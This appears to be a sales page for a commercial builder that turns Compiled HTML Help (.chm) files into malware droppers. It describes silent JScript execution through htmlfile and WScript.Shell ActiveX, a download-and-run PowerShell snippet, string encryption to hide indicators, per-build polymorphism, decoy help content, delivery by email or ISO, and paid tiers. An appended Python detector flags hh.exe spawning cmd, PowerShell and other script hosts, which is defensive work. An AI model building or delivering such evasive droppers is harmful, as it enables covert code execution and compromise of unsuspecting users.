A CHM (Compiled HTML Help) file is a Microsoft ITSF-format container holding a compiled set of HTML pages, JScript, CSS, and images. It's opened with hh.exe — a Microsoft-signed viewer that ships with every modern Windows.
Inside the help context, embedded JScript runs with WScript.Shell via htmlfile/ActiveX object instantiation — no need for the user to enable anything. Exploit Builder constructs a CHM whose default-page JScript triggers your payload silently while a credible-looking help topic is shown to the user.
hh.exe — Microsoft-signed, low-suspicion viewer
htmlfile, WScript.Shell) execution path
URL-only. Supply an HTTPS endpoint hosting your payload — the embedded JScript fetches and executes it on open. CHM does not embed binary payloads.
Select decoy topic: software readme, manual excerpt, internal procedure.
Default-page JScript, onload, or shortcut/object hook within the help index.
Builder produces a fully-valid ITSF .chm ready for delivery.
Builder writes a fully spec-compliant ITSF stream: SECTION tables, #SYSTEM, #STRINGS, content listing, LZX-compressed page data.
Pages execute inside the HTML Help engine, which uses MSHTML. JScript is permitted; htmlfile ActiveX instantiation gives access to WScript.Shell.
Optional alternative trigger: HTML Help's ShortCut object can launch arbitrary commands. Powerful but easier to detect than the JScript path.
URLs, command names, and decoy text encrypted in the JScript layer; decrypted at runtime so the static .chm binary holds no plain-text IOCs.
Authentic-looking help content (TOC, index, formatted topic body) so the help window looks like real documentation.
Page filenames, JScript variable names, comment layout, and string-table layout differ each build.
```html
<script>
var h = new ActiveXObject("htmlfile");
var s = h.parentWindow.ActiveXObject("WScript.Shell");
var u = Dec("...enc...", k);
s.Run("cmd /c powershell -nop -w 1 iex(...)", 0, false);
</script>
```
| Output Format | Compiled HTML Help (.chm) — Microsoft ITSF container |
|---|---|
| Delivery Mode | URL only — embedded JScript fetches the payload at runtime. No local-embed mode. |
| OS Compatibility | Windows XP / 7 / 8.1 / 10 / 11 (hh.exe ships by default) |
| Host Process | hh.exe — Microsoft-signed HTML Help viewer |
| Execution Surface | JScript · ActiveX (htmlfile, WScript.Shell) · ShortCut object |
| Triggers | Default-page onload · Body inline · ShortCut element |
| Decoy Topics | Software readme · Manual · Procedure document · Custom HTML |
| Compression | LZX (standard ITSF) |
| Polymorphism | Page names · JScript layout · String tables · Comment injection |
| Recommended Carrier | Direct mail · ZIP · ISO/IMG |
Validate rules around hh.exe spawning network/script children — a relatively low-volume telemetry channel.
Highly effective against environments with legacy software where help files are common and unsuspicious.
Demonstrate that "documentation files" can run code without enable-content prompts.
Test detonation of .chm files within varied EDR/sandbox stacks; many provide little coverage of this format.
Reproduce TTPs from APT actors using CHM (notably APT41, Kimsuky, Bitter, SideWinder) for purple-team validation.
Use as a trusted-looking stage opened by an LNK that calls hh.exe directly.
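
The rule on hh.exe spawning script children, mentioned in the list above, can be validated with logic like the following. This is an added example, not code from the original page or the product; the event field names (loosely modeled on Sysmon process-creation fields), the suspect-image list and the sample events are assumptions constructed for illustration.

```python
import ntpath

# Script and LOLBin hosts hh.exe has no routine reason to start (assumed list; tune it).
SUSPECT = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
           "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

def base(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path or "").lower()

def detect_hh_descendants(events):
    """Flag suspect processes whose ancestry leads back to hh.exe.

    events: time-ordered process-creation records (dicts). PID reuse is
    ignored, which is acceptable for a short correlation window.
    """
    lineage = {}  # pid -> command line of the hh.exe at the root of the chain
    alerts = []
    for e in events:
        direct = base(e["parent_image"]) == "hh.exe"
        if direct:
            root = e["parent_cmdline"]
        elif e["ppid"] in lineage:
            root = lineage[e["ppid"]]  # grandchild or deeper, e.g. cmd -> powershell
        else:
            continue
        lineage[e["pid"]] = root
        if base(e["image"]) in SUSPECT:
            alerts.append({"pid": e["pid"], "image": base(e["image"]),
                           "hh_cmdline": root, "direct_child": direct})
    return alerts

def make_event(pid, ppid, image, parent_image, parent_cmdline=""):
    """Build one constructed process-creation record."""
    return {"pid": pid, "ppid": ppid, "image": image,
            "parent_image": parent_image, "parent_cmdline": parent_cmdline}

# Constructed sample events: a help file is opened, then a cmd -> powershell chain.
SAMPLE = [
    make_event(4100, 3000, r"C:\Windows\hh.exe", r"C:\Windows\explorer.exe"),
    make_event(4200, 4100, r"C:\Windows\System32\cmd.exe", r"C:\Windows\hh.exe",
               r'hh.exe "C:\Users\test\Downloads\readme.chm"'),
    make_event(4300, 4200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               r"C:\Windows\System32\cmd.exe"),
    make_event(4400, 3000, r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for alert in detect_hh_descendants(SAMPLE):
        print(alert)
```

Tracking lineage rather than only the direct parent matters here because the `cmd /c powershell` pattern in the snippet above puts the PowerShell process one level below hh.exe.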
All tiers include unlimited builds, every decoy topic profile, full polymorphism, and updates within the term.